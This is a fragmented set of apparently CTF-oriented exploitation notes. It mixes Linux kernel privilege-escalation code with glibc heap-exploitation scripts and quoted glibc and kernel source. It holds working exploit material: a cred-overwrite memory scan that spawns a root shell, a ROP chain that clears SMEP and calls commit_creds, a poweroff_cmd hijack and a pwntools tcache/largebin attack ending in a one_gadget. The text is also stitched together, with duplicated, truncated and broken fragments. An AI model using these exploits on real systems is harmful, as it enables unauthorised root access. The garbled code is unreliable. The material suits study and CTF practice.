// ioctl command handler
long condition_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    int retval = 0;
    printk(KERN_INFO "Ioctl Get!\n");
    switch (cmd) {
    case 111: //doubleCon
        //get flag_addr
        printk("Your flag is at %llx! But I don't think you know it's content\n", flag);
        break;
    case 222: //doubleCon
        //print flag
        flagObj = (struct flagStruct *)arg;
        ssize_t userFlagAddr = flagObj->flagUser;
        ssize_t userFlagObjAddr = (ssize_t)flagObj;
        if (chk_range_not_ok(userFlagAddr, flagObj->len)
            && chk_range_not_ok(userFlagObjAddr, 0)
            && (flagObj->len == strlen(flag)))
        {
            if (!strncmp(flagObj->flagUser, flag, strlen(flag)))
                printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);
            else
                printk("Wrong!");
            break;
        }
        else
        {
            printk("Wrong!\n");
            break;
        }
    default:
        retval = -1;
        break;
    }
    return retval;
}
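From user space the two commands are reached with plain ioctl() calls. Below is a minimal sketch of the trigger side, assuming the module registers a node such as /dev/condition (the actual node name is not shown above, so it is a placeholder) and that struct flagStruct is laid out as {flagUser, len}:

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

struct flagStruct {
    char *flagUser;   /* pointer to our guess buffer */
    size_t len;       /* must equal strlen(flag) to pass the length check */
};

int main(void)
{
    int fd = open("/dev/condition", O_RDWR);   /* hypothetical node name */
    if (fd < 0) { perror("open"); return 1; }

    ioctl(fd, 111, 0);                         /* cmd 111: prints the flag's kernel address via printk */

    char guess[] = "flag{????????????}";       /* placeholder guess of the right length */
    struct flagStruct obj = { .flagUser = guess, .len = strlen(guess) };
    ioctl(fd, 222, (unsigned long)&obj);       /* cmd 222: compares the guess against the flag */

    close(fd);
    return 0;
}

Note that with ordinary user-space pointers both chk_range_not_ok() calls presumably return false, so this naive call only reaches the "Wrong!" branch; satisfying that inverted range check is the actual puzzle.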
static char *flag = "flag{PIG007NBHH}";
//--------------------------------------------------
if (chk_range_not_ok(userFlagAddr, flagObj->len)
    && chk_range_not_ok(userFlagObjAddr, 0)
    && (flagObj->len == strlen(flag)))
{
    if (!strncmp(flagObj->flagUser, flag, strlen(flag)))
        printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);
    else
        printk("Wrong!");
    break;
}
else
{
    printk("Wrong!\n");
    break;
}
//v5.11 /ipc/msg.c
struct msg_queue {
    // bookkeeping fields for the queue
    struct kern_ipc_perm q_perm;
    time64_t q_stime;           /* last msgsnd time */
    time64_t q_rtime;           /* last msgrcv time */
    time64_t q_ctime;           /* last change time */
    unsigned long q_cbytes;     /* current number of bytes on queue */
    unsigned long q_qnum;       /* number of messages in queue */
    unsigned long q_qbytes;     /* max number of bytes on queue */
    struct pid *q_lspid;        /* pid of last msgsnd */
    struct pid *q_lrpid;        /* last receive pid */
//v5.11, inside do_msgrcv()
/* If we are copying, then do not unlink message and do
 * not update queue parameters. */
if (msgflg & MSG_COPY) {
    msg = copy_msg(msg, copy);
    goto out_unlock0;
}
for (seg = msg->next; seg != NULL; seg = seg->next) {
    len -= alen;
    dest = (char __user *)dest + alen;
    alen = min(len, DATALEN_SEG);
    if (copy_to_user(dest, seg + 1, alen))
        return -1;
}
return 0;
}
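For reference, this is how MSG_COPY is driven from user space: the message is copied out by its index and left on the queue, which is why it pairs well with a corrupted msg_msg for repeated out-of-bounds reads. A minimal stand-alone sketch (the queue setup is purely illustrative; MSG_COPY requires CONFIG_CHECKPOINT_RESTORE and must be combined with IPC_NOWAIT):

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#ifndef MSG_COPY
#define MSG_COPY 040000   /* copy (do not remove) the message at the given index */
#endif

struct msgbuf_demo {
    long mtype;
    char mtext[0x100];
};

int main(void)
{
    struct msgbuf_demo snd = { .mtype = 1 }, rcv = { 0 };
    int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);

    strcpy(snd.mtext, "hello");
    msgsnd(qid, &snd, sizeof(snd.mtext), 0);

    /* With MSG_COPY the "msgtyp" argument is the message index and the
       message stays on the queue, so it can be read again and again. */
    if (msgrcv(qid, &rcv, sizeof(rcv.mtext), 0,
               MSG_COPY | IPC_NOWAIT | MSG_NOERROR) >= 0)
        printf("peeked: %s\n", rcv.mtext);

    return 0;
}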
// dump the vDSO and locate gettimeofday
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/auxv.h>

int main(){
    int test;
    size_t result = 0;
    unsigned long sysinfo_ehdr = getauxval(AT_SYSINFO_EHDR);
    result = (size_t)memmem((void *)sysinfo_ehdr, 0x1000, "gettimeofday", 12);
    printf("[+]VDSO : %p\n", (void *)sysinfo_ehdr);
    printf("[+]The offset of gettimeofday is : %x\n", (unsigned int)(result - sysinfo_ehdr));
    scanf("Wait! %d", &test);
    /* gdb break point at 0x400A36 and then dump memory
       why only dump 0x1000 ??? */
    if (sysinfo_ehdr != 0){
        for (int i = 0; i < 0x2000; i += 1){
            printf("%02x ", *(unsigned char *)(sysinfo_ehdr + i));
        }
    }
}
struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
    /*
     * For reasons of header soup (see current_thread_info()), this
     * must be the first element of task_struct.
     */
    struct thread_info       thread_info;
#endif
    //............................................
    /* Tracer's credentials at attach: */
    const struct cred __rcu  *ptracer_cred;

    /* Objective and real subjective task credentials (COW): */
    const struct cred __rcu  *real_cred;

    /* Effective (overridable) subjective task credentials (COW): */
    const struct cred __rcu  *cred;

    /*
     * executable name, excluding path.
     */
    char                     comm[TASK_COMM_LEN];
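The scan in the exploit below looks for a known 16-byte marker in kernel memory; since real_cred and cred sit right before comm in task_struct, planting the marker in the task's comm is a common way to find them. A minimal sketch, assuming the exploit uses a fixed marker string (the string itself is an assumption):

#include <string.h>
#include <sys/prctl.h>

/* comm is at most 16 bytes (TASK_COMM_LEN), so the memory scan can
   match on these exact bytes inside our own task_struct. */
char target[16];

void tag_current_task(void)
{
    strcpy(target, "PIG007NBPIG007N");           /* 15 chars + NUL = 16-byte pattern */
    prctl(PR_SET_NAME, (unsigned long)target);   /* write the pattern into current->comm */
}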
//open Dev
char* pos = "/dev/arbWriteModule";
devFD = openDev(pos);

//search target chr
char *buf = (char *)calloc(1, 0x1000);
puts("[+] we can read and write any memory");
for (; addr < 0xffffc80000000000; addr += 0x1000){
    arbitrary_read(devFD, 0x1000, buf, addr);
    result = memmem(buf, 0x1000, target, 16);
    if (result){
        printf("result:%p\n", result);
        cred = *(size_t *)(result - 0x8);
        real_cred = *(size_t *)(result - 0x10);
        // if ((cred||0xff00000000000000) && (real_cred == cred))
        // {
            target_addr = addr + result - (int)(buf);
            printf("[+]found task_struct 0x%lx\n", target_addr);
            printf("[+]found cred 0x%lx\n", real_cred);
            break;
        // }
    }
}
if (result == 0) {
    puts("not found , try again ");
    exit(-1);
}
arbitrary_write(devFD,28,root_cred,real_cred);
if (getuid() == 0){
    printf("[+]now you are r00t,enjoy ur shell\n");
    system("/bin/sh");
} else {
    puts("[-] there must be something wrong ... ");
    exit(-1);
}

return 0;
}

int openDev(char* pos){
    int devFD;
    printf("[+] Open %s...\n", pos);
    if ((devFD = open(pos, O_RDWR)) < 0) {
        printf(" Can't open device file: %s\n", pos);
        exit(1);
    }
    return devFD;
}
//version 4.4.72
static int __orderly_poweroff(bool force)
{
    int ret;
ret = run_cmd(poweroff_cmd);
if (ret && force) { pr_warn("Failed to start orderly shutdown: forcing the issue\n");
    /*
     * I guess this should try to kick off some daemon to sync and
     * poweroff asap.  Or not even bother syncing if we're doing an
     * emergency shutdown?
     */
    emergency_sync();
    kernel_power_off();
}
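The interesting part is run_cmd(poweroff_cmd): poweroff_cmd is a writable string in kernel data (it defaults to "/sbin/poweroff"), and run_cmd() launches it as a root usermode helper, much like the well-known modprobe_path trick. A hedged sketch of how the arbitrary write from the module above could redirect it (the address lookup is left out, and everything besides arbitrary_write/devFD is an assumption):

/* Sketch only: poweroff_cmd_addr has to be located separately,
   e.g. from /proc/kallsyms or by scanning for "/sbin/poweroff". */
void hijack_poweroff_cmd(int devFD, unsigned long poweroff_cmd_addr)
{
    char evil[] = "/tmp/x";   /* script that copies the flag or drops a root shell */
    arbitrary_write(devFD, sizeof(evil), evil, poweroff_cmd_addr);
    /* from now on, an orderly poweroff makes the kernel run /tmp/x as root */
}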
struct mutex atomic_write_lock;
struct mutex legacy_mutex;
struct mutex throttle_mutex;
struct rw_semaphore termios_rwsem;
struct mutex winsize_mutex;
spinlock_t ctrl_lock;
spinlock_t flow_lock;
/* Termios values are protected by the termios rwsem */
struct ktermios termios, termios_locked;
struct termiox *termiox;        /* May be NULL for unsupported */
char name[64];
struct pid *pgrp;               /* Protected by ctrl lock */
struct pid *session;
unsigned long flags;
int count;
struct winsize winsize;         /* winsize_mutex */
unsigned long stopped:1,        /* flow_lock */
              flow_stopped:1,
              unused:BITS_PER_LONG - 2;
int hw_stopped;
unsigned long ctrl_status:8,    /* ctrl_lock */
              packet:1,
              unused_ctrl:BITS_PER_LONG - 9;
unsigned int receive_room;      /* Bytes free for queue */
int flow_change;

struct tty_struct *link;
struct fasync_struct *fasync;
int alt_speed;                  /* For magic substitution of 38400 bps */
wait_queue_head_t write_wait;
wait_queue_head_t read_wait;
struct work_struct hangup_work;
void *disc_data;
void *driver_data;
struct list_head tty_files;
#define N_TTY_BUF_SIZE 4096
int closing;
unsigned char *write_buf;
int write_cnt;
/* If the tty has a pending do_SAK, queue it here - akpm */
struct work_struct SAK_work;
struct tty_port *port;
};
// dev_t and cdev are set up as usual, but here the class framework is used to create the device node
// in dev_t, the high 12 bits are the major number and the low 20 bits are the minor number
static dev_t first;            // Global variable for the first device number
static struct cdev c_dev;      // Global variable for the character device structure
static struct class *cl;       // Global variable for the device class
static char *buffer_var;
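For reference, a typical registration sequence with these globals looks roughly like the following (a sketch of the usual cdev + class pattern, not the challenge module's exact code; names such as demo_dev are made up):

#include <linux/module.h>
#include <linux/fs.h>
#include <linux/cdev.h>
#include <linux/device.h>

static struct file_operations fops = {
    .owner = THIS_MODULE,
    /* .read / .write / .unlocked_ioctl would go here */
};

static int __init demo_init(void)
{
    /* ask the kernel for one dynamically allocated major/minor pair */
    if (alloc_chrdev_region(&first, 0, 1, "demo_dev") < 0)
        return -1;

    /* class_create() + device_create() is what makes /dev/demo_dev appear via udev */
    cl = class_create(THIS_MODULE, "demo_class");
    device_create(cl, NULL, first, NULL, "demo_dev");

    cdev_init(&c_dev, &fops);
    cdev_add(&c_dev, first, 1);

    printk(KERN_INFO "major=%d minor=%d\n", MAJOR(first), MINOR(first));
    return 0;
}

static void __exit demo_exit(void)
{
    cdev_del(&c_dev);
    device_destroy(cl, first);
    class_destroy(cl);
    unregister_chrdev_region(first, 1);
}

module_init(demo_init);
module_exit(demo_exit);
MODULE_LICENSE("GPL");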
/* set value for commit_creds and prepare_kernel_cred */
commit_creds = (commit_creds_t)(memOffset - 0xfbf6a0);
prepare_kernel_cred = (prepare_kernel_cred_t)(memOffset - 0xfbf2e0);

/* open fd on /dev/vuln */
printf("[+] Open vuln device...\n");
if ((fd = open("/dev/stack", O_RDWR)) < 0) {
    printf("    Can't open device file: /dev/stack\n");
    exit(1);
}
/* payload */ printf("[+] Construct the payload...\n"); save_state(); /* offset before RIP */ memcpy(p,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",116); p+=116;
memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8); /* for rbp */ p+=8;
/* pop rax;rbx;r12;rbp;ret */
memcpy(p, &pop_rax_rbx_r12_rbp_ret, 8);
printf("    pop rax at 0x%lx\n", pop_rax_rbx_r12_rbp_ret);
p += 8;
memcpy(p, "\xf0\x06\x00\x00\x00\x00\x00\x00", 8); /* SMEP OFF: rax = 0x6f0, a CR4 value with the SMEP bit (bit 20) cleared */
p += 8;
memcpy(p, "\x00\x00\x00\x00\x00\x00\x00\x00", 8); /* rbx */
p += 8;
memcpy(p, "\x00\x00\x00\x00\x00\x00\x00\x00", 8); /* r12 */
p += 8;
memcpy(p, "\x42\x42\x42\x42\x42\x42\x42\x42", 8); /* rbp */
p += 8;
/* set value for commit_creds and prepare_kernel_cred */
commit_creds = (commit_creds_t)(memOffset - 0xfbf6a0);
prepare_kernel_cred = (prepare_kernel_cred_t)(memOffset - 0xfbf2e0);

/* open fd on /dev/vuln */
printf("[+] Open vuln device...\n");
if ((fd = open("/dev/stack", O_RDWR)) < 0) {
    printf("    Can't open device file: /dev/stack\n");
    exit(1);
}
/* payload */ printf("[+] Construct the payload...\n"); save_state(); /* offset before RIP */ memcpy(p,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",116); p+=116;
memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8); /* for rbp */ p+=8;
/* getroot */
memcpy(p, &getR, 8);
p += 8;

/* swapgs;ret */
printf("    swapgs at 0x%lx\n", swapgs);
memcpy(p, &swapgs, 8);
p += 8;

/* iretq */
printf("    iretq at 0x%lx\n", iretq);
memcpy(p, &iretq, 8);
p += 8;
/*
   the stack should look like this when the iretq executes:
       RIP
       CS
       EFLAGS
       RSP
       SS
*/
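save_state() from earlier captures the user-mode values that this iretq frame needs. A common implementation looks like the sketch below (variable names are assumptions, not necessarily the writeup's own helpers):

unsigned long user_cs, user_ss, user_sp, user_rflags;

/* snapshot the current user-mode segment selectors, stack pointer and flags
   so the ROP chain can iretq back into this process after getting root */
void save_state(void)
{
    __asm__ __volatile__(
        "movq %%cs,  %0\n"
        "movq %%ss,  %1\n"
        "movq %%rsp, %2\n"
        "pushfq\n"
        "popq %3\n"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_sp), "=r"(user_rflags)
        :
        : "memory");
}

The RIP slot of the frame is then typically filled with the address of a user-space function that spawns a shell once execution returns to ring 3.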
/* Take a chunk off a bin list.  */
static void
unlink_chunk (mstate av, mchunkptr p)
{
  if (chunksize (p) != prev_size (next_chunk (p)))
    malloc_printerr ("corrupted size vs. prev_size");
  mchunkptr fd = p->fd;
  mchunkptr bk = p->bk;

  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
    malloc_printerr ("corrupted double-linked list");

  fd->bk = bk;
  bk->fd = fd;
  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
    {
      if (p->fd_nextsize->bk_nextsize != p
          || p->bk_nextsize->fd_nextsize != p)
        malloc_printerr ("corrupted double-linked list (not small)");
#free 0~48 #1~49
#-------------------------
#--tcache
for i in range(0,7):    #0x88
    free(i+1)
for i in range(14,21):  #0xa8
    free(i+1)
for i in range(21,28):  #0xb8
    free(i+1)
for i in range(35,42):  #0xd8
    free(i+1)
for i in range(42,49):  #0xe8
    free(i+1)
#--tcache

for i in range(52,57):  #52~56 #53~57 merge into unsortedbin
    free(i+1)
#free 0~48 #1~49
#-------------------------
#--tcache
for i in range(0,7):    #0x88
    free(i+1)
for i in range(14,21):  #0xa8
    free(i+1)
for i in range(21,28):  #0xb8
    free(i+1)
for i in range(35,42):  #0xd8
    free(i+1)
for i in range(42,49):  #0xe8
    free(i+1)
#--tcache

for i in range(52,57):  #52~56 #53~57 merge into unsortedbin
    free(i+1)
#----------------------------------------------------------------
# the chunks above have consolidated into one big unsorted bin chunk
# the add calls below carve it up: the unsorted bin remainder is moved into the largebin and then allocated from
add_malloc(0x98,'\x00')  # 52 #97  #0x****9c0
add_malloc(0x98,'\x00')  # 53 #98  #0x****A60
fake_chunk_size = 0x98 * "a" + p16(0x200)
# here the heap overflow is used to imitate an off-by-null, shrinking the size of the chunk
# that is still in the largebin from 0x2e1 to 0x200
# changing largebinChunk_size will not cause an abort
edit(98, 0x98+0x2, fake_chunk_size)  #53 #98
add_malloc(0x88,'\x00')  #54 #99  #0x****B00
add_malloc(0x88,'\x00')  #55 #100 #0x****B90
add_malloc(0xd8,'\x00')  #56 #101 #0x****C70
# build the prev chunk's fd and bk ------------------------
#------tcache
for i in range(7,14):   #0x98
    free(i+1)
for i in range(0,7):    #0x88
    free(i+1)
for i in range(42,49):  #0xe8
    free(i+1)
#------tcache
# repair FD->bk and BK->fd -----------------------------
#------tcache
for i in range(42,49):  #0xe8
    free(i+1)
for i in range(7,14):   #0x98
    free(i+1)
for i in range(21,28):  #0xb8
    free(i+1)
#------tcache
//2.33 _int_malloc
size = chunksize (victim);
// this size is the size of the chunk in the largebin; nb is the size of the requested chunk
/* We know the first chunk in this bin is big enough to use. */
assert ((unsigned long) (size) >= (unsigned long) (nb));
/* Use the slow path in case any printf handler is registered.  */
if (__glibc_unlikely (__printf_function_table != NULL
                      || __printf_modifier_table != NULL
                      || __printf_va_arg_table != NULL))
  goto do_positional;
for i in range(len(one_gadget)):
    lg("one_gadget["+str(i)+"]", libc_base+one_gadget[i])
add_malloc(0x68, '\x00'*0x13 + p64(libc_base+one_gadget[]))
#add_malloc(0x18,'PIG007NB')
p.sendline('1')
p.sendline('1')
p.sendline('1')
p.interactive()
# write_end cannot be too far from write_base
add_malloc(size_write_end-0x8, (p64(0x0)+p64(0x21)) * ((size_write_end-0x10)/0x10))  #idx 0x7
add_malloc(size_write_ptr-0x8, (p64(0x0)+p64(0x21)) * ((size_write_ptr-0x10)/0x10))  #idx 0x8
/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  struct tcache_perthread_struct *key;
} tcache_entry;
{
  size_t tc_idx = csize2tidx (size);
  if (tcache != NULL && tc_idx < mp_.tcache_bins)
    {
      /* Check to see if it's already in the tcache.  */
      tcache_entry *e = (tcache_entry *) chunk2mem (p);

      /* This test succeeds on double free.  However, we don't 100%
         trust it (it also matches random payload data at a 1 in
         2^<size_t> chance), so verify it's not an unlikely
         coincidence before aborting.  */
      if (__glibc_unlikely (e->key == tcache))
        {
          tcache_entry *tmp;
          LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
          for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
            if (tmp == e)
              malloc_printerr ("free(): double free detected in tcache 2");
          /* If we get here, it was a coincidence.  We've wasted a
             few cycles, but don't abort.  */
        }
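To see this check fire outside the challenge, a two-line double free of a tcache-sized chunk is enough; glibc 2.29 and later aborts with exactly the message above:

#include <stdlib.h>

int main(void)
{
    void *a = malloc(0x48);   /* tcache-sized request */
    free(a);                  /* first free: e->key is set to the tcache pointer */
    free(a);                  /* second free: key matches -> "free(): double free detected in tcache 2" */
    return 0;
}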
  if (in_smallbin_range (nb))
    {
      idx = smallbin_index (nb);
      bin = bin_at (av, idx);

      if ((victim = last (bin)) != bin)
        {
          if (victim == 0) /* initialization check */
            malloc_consolidate (av);
          else
            {
              bck = victim->bk;
              if (__glibc_unlikely (bck->fd != victim))
                {
                  errstr = "malloc(): smallbin double linked list corrupted";
                  goto errout;
                }
              set_inuse_bit_at_offset (victim, nb);
              bin->bk = bck;
              bck->fd = bin;

              if (av != &main_arena)
                set_non_main_arena (victim);
              check_malloced_chunk (av, victim, nb);

#if USE_TCACHE
              /* While we're here, if we see other chunks of the same
                 size, stash them in the tcache.  */
              size_t tc_idx = csize2tidx (nb);
              if (tcache && tc_idx < mp_.tcache_bins)
                {
                  mchunkptr tc_victim;

                  /* While bin not empty and tcache not full, copy chunks over.  */
                  while (tcache->counts[tc_idx] < mp_.tcache_count
                         && (tc_victim = last (bin)) != bin)
                    {
                      if (tc_victim != 0)
                        {
                          bck = tc_victim->bk;
                          set_inuse_bit_at_offset (tc_victim, nb);
                          if (av != &main_arena)
                            set_non_main_arena (tc_victim);
                          bin->bk = bck;
                          bck->fd = bin;
//2.32
  if (in_smallbin_range (nb))
    {
      idx = smallbin_index (nb);
      bin = bin_at (av, idx);

      if ((victim = last (bin)) != bin)
        {
          if (victim == 0) /* initialization check */
            malloc_consolidate (av);
          else
            {
              bck = victim->bk;
              if (__glibc_unlikely (bck->fd != victim))
                {
                  errstr = "malloc(): smallbin double linked list corrupted";
                  goto errout;
                }
              set_inuse_bit_at_offset (victim, nb);
              bin->bk = bck;
              bck->fd = bin;

              if (av != &main_arena)
                set_non_main_arena (victim);
              check_malloced_chunk (av, victim, nb);

#if USE_TCACHE
              /* While we're here, if we see other chunks of the same
                 size, stash them in the tcache.  */
              size_t tc_idx = csize2tidx (nb);
              if (tcache && tc_idx < mp_.tcache_bins)
                {
                  mchunkptr tc_victim;

                  /* While bin not empty and tcache not full, copy chunks over.  */
                  while (tcache->counts[tc_idx] < mp_.tcache_count
                         && (tc_victim = last (bin)) != bin)
                    {
                      if (tc_victim != 0)
                        {
                          bck = tc_victim->bk;
                          set_inuse_bit_at_offset (tc_victim, nb);
                          if (av != &main_arena)
                            set_non_main_arena (tc_victim);
                          bin->bk = bck;
                          bck->fd = bin;
if (SINGLE_THREAD_P)
  {
    /* Check that the top of the bin is not the record we are going to
       add (i.e., double free).  */
    if (__builtin_expect (old == p, 0))
      malloc_printerr ("double free or corruption (fasttop)");
    p->fd = PROTECT_PTR (&p->fd, old);
    *fb = p;
  }
else
  do
    {
      /* Check that the top of the bin is not the record we are going to
         add (i.e., double free).  */
      if (__builtin_expect (old == p, 0))
        malloc_printerr ("double free or corruption (fasttop)");
      old2 = old;
      p->fd = PROTECT_PTR (&p->fd, old);
    }
  while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
         != old2);
/* Safe-Linking: Use randomness from ASLR (mmap_base) to protect single-linked lists of Fast-Bins and TCache. That is, mask the "next" pointers of the lists' chunks, and also perform allocation alignment checks on them. This mechanism reduces the risk of pointer hijacking, as was done with Safe-Unlinking in the double-linked lists of Small-Bins. It assumes a minimum page size of 4096 bytes (12 bits). Systems with larger pages provide less entropy, although the pointer mangling still works. */
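Concretely, the mangling is an XOR of the pointer with the address of its storage slot shifted right by 12 bits. Below is a small stand-alone re-implementation of the same transform (it mirrors glibc's PROTECT_PTR/REVEAL_PTR macros, but is not the library code itself):

#include <stdio.h>
#include <stdint.h>

/* mangled = (&slot >> 12) ^ ptr; reversing it requires knowing the
   address where the pointer is stored (i.e. heap ASLR bits). */
static void *protect_ptr(void **pos, void *ptr)
{
    return (void *)(((uintptr_t)pos >> 12) ^ (uintptr_t)ptr);
}

static void *reveal_ptr(void **pos)
{
    return protect_ptr(pos, *pos);   /* XOR is its own inverse */
}

int main(void)
{
    void *next = (void *)0x55555555a2a0;   /* pretend "next" chunk */
    void *slot = NULL;                     /* pretend fd / tcache next field */

    slot = protect_ptr(&slot, next);
    printf("mangled:  %p\n", slot);
    printf("revealed: %p\n", reveal_ptr(&slot));   /* prints 0x55555555a2a0 again */
    return 0;
}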
static void
tcache_thread_shutdown (void)
{
  int i;
  tcache_perthread_struct *tcache_tmp = tcache;
if (!tcache) return;
  /* Disable the tcache and prevent it from being reinitialized.  */
  tcache = NULL;
  tcache_shutting_down = true;

  /* Free all of the entries and the tcache itself back to the arena
     heap for coalescing.  */
  for (i = 0; i < TCACHE_MAX_BINS; ++i)
    {
      while (tcache_tmp->entries[i])
        {
          tcache_entry *e = tcache_tmp->entries[i];
          if (__glibc_unlikely (!aligned_OK (e)))
            malloc_printerr ("tcache_thread_shutdown(): "
                             "unaligned tcache chunk detected");
          tcache_tmp->entries[i] = REVEAL_PTR (e->next);
          __libc_free (e);
        }
    }
if (__glibc_unlikely (e->key == tcache))
  {
    tcache_entry *tmp;
    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
    for (tmp = tcache->entries[tc_idx];
         tmp;
         tmp = REVEAL_PTR (tmp->next))
      {
        if (__glibc_unlikely (!aligned_OK (tmp)))
          malloc_printerr ("free(): unaligned chunk detected in tcache 2");
        if (tmp == e)
          malloc_printerr ("free(): double free detected in tcache 2");
        /* If we get here, it was a coincidence.  We've wasted a
           few cycles, but don't abort.  */
      }
  }
if (__glibc_unlikely (!aligned_OK (tmp)))
  malloc_printerr ("free(): unaligned chunk detected in tcache 2");